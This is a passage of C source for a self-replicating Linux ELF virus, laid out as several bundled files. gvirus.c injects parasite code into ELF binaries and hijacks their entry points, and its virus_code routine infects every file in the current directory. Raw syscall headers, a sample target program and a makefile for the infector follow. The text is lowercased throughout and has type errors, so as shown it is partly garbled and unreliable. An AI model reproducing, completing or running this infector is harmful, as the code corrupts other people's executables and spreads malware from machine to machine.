ehdr->e_shoff += align_code_size;
/* make a new file */
tmp_fd = g_open(tmpfile, o_wronly|o_creat|o_trunc, stat.st_mode);
if (tmp_fd == -1) {
goto err;
}
size = new_code_pos - (void *) ehdr;
if (g_write(tmp_fd, ehdr, size) != size)
goto err;
__memcpy(tmp_v_code, v_code, v_code_size);
__memcpy(tmp_v_code + v_retaddr_addr_offset, &org_entry, sizeof(org_entry));
if (g_write(tmp_fd, tmp_v_code, align_code_size) != align_code_size) {
goto err;
}
if (g_write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
goto err;
}
g_close(tmp_fd);
g_munmap(ehdr, stat.st_size);
g_close(fd);
if (g_rename(tmpfile, file) == -1) {
goto err;
}
return 0;
err:
if (tmp_fd != -1)
g_close(tmp_fd);
if (ehdr)
g_munmap(ehdr, stat.st_size);
if (fd != -1)
g_close(fd);
return -1;
}
static inline void virus_code(void)
{
char dirdata[4096];
struct dirent *dirp;
int curfd;
int nbyte, c;
unsigned long para_code_start_addr;
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
char curdir[2] = {".", 0};
char newline = "\n";
curdir[0] = ".";
curdir[1] = 0;
newline = "\n";
if ((curfd = g_open(curdir, o_rdonly, 0)) < 0)
goto out;
/* get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
para_code_start_addr -= paracode_retaddr_addr_offset - 1;
/* infecting */
while ((nbyte = g_getdents(curfd, (struct dirent *)
&dirdata, sizeof(dirdata))) > 0) {
c = 0;
dirp = (struct dirent *) &dirdata;
do {
v_debug_write(1, dirp->d_name, dirp->d_reclen - (unsigned long)
&(((struct dirent *) 0)->d_name));
v_debug_write(1, &newline, sizeof(newline));
infect_virus(dirp->d_name,
(void *) para_code_start_addr,
paracode_length,
paracode_retaddr_addr_offset);
c += dirp->d_reclen;
if (c >= nbyte)
break;
dirp = (struct dirent *)((char *)dirp + dirp->d_reclen);
} while (1);
}
g_close(curfd);
out:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xaabbccdd\n\t" /* push ret_addr */
"ret\n"
::);
}
void parasite_code(void)
{
virus_code();
}
void parasite_code_end(void) {parasite_code();}
------------------------------ gvirus.c ------------------------------
------------------------------ gunistd.h ------------------------------
#ifndef _g2_unistd_
#define _g2_unistd_
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name)); \
g__syscall_return(type,__res); \
}
#define g_syscall1(type,name,type1,arg1) \
type g_##name(type1 arg1) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1))); \
g__syscall_return(type,__res); \
}
#define g_syscall2(type,name,type1,arg1,type2,arg2) \
type g_##name(type1 arg1,type2 arg2) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2))); \
g__syscall_return(type,__res); \
}
#define g_syscall3(type,name,type1,arg1,type2,arg2,type3,arg3) \
type g_##name(type1 arg1,type2 arg2,type3 arg3) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3))); \
g__syscall_return(type,__res); \
}
#define g_syscall4(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4) \
type g_##name (type1 arg1, type2 arg2, type3 arg3, type4 arg4) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"s" ((long)(arg4))); \
g__syscall_return(type,__res); \
}
#define g_syscall5(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"s" ((long)(arg4)),"d" ((long)(arg5))); \
g__syscall_return(type,__res); \
}
#define g_syscall6(type,name,type1,arg1,type2,arg2,type3,arg3,type4,arg4, \
type5,arg5,type6,arg6) \
type g_##name (type1 arg1,type2 arg2,type3 arg3,type4 arg4,type5 arg5,type6 arg6) \
{ \
long __res; \
__asm__ volatile ("push %%ebp ; movl %%eax,%%ebp ; movl %1,%%eax ; int $0x80 ; pop %%ebp" \
: "=a" (__res) \
: "i" (__nr_##name),"b" ((long)(arg1)),"c" ((long)(arg2)), \
"d" ((long)(arg3)),"s" ((long)(arg4)),"d" ((long)(arg5)), \
"0" ((long)(arg6))); \
g__syscall_return(type,__res); \
}
#endif /* _g2_unistd_ */
------------------------------ gunistd.h ------------------------------
------------------------------ gsyscall.h ------------------------------
#ifndef _g2_syscall_
#define _g2_syscall_
#include <sys/types.h>
#include <sys/mman.h>
#include <linux/unistd.h>
#include <linux/fcntl.h>
#include "gunistd.h"
#define null 0
struct dirent {
long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[256]; /* we must not include limits.h! */
};
struct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
static inline g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
static inline g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
static inline g_syscall3(int, open, const char *, file, int, flag, int, mode);
static inline g_syscall1(int, close, int, fd);
static inline g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
int, flags, int, fd, off_t, offset);
static inline g_syscall2(int, munmap, void *, addr, size_t, len);
static inline g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
static inline g_syscall2(int, fstat, int, filedes, struct stat *, buf);
static inline void * __memcpy(void * to, const void * from, size_t n)
{
int d0, d1, d2;
__asm__ __volatile__(
"rep ; movsl\n\t"
"testb $2,%b4\n\t"
"je 1f\n\t"
"movsw\n"
"1:\ttestb $1,%b4\n\t"
"je 2f\n\t"
"movsb\n"
"2:"
: "=&c" (d0), "=&d" (d1), "=&s" (d2)
:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
: "memory");
return (to);
}
#endif /* _g2_syscall_ */
------------------------------ gsyscall.h ------------------------------
------------------------------ foo.c ------------------------------
#include <stdio.h>
int main()
{
puts("real elf point");
return 0;
}
------------------------------ foo.c ------------------------------
------------------------------ makefile ------------------------------
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -o2 $< gvirus.o -o gei -wall -dndebug
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -o2 -c -o gvirus.o -fomit-frame-pointer -wall -dndebug
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
------------------------------ makefile ------------------------------
|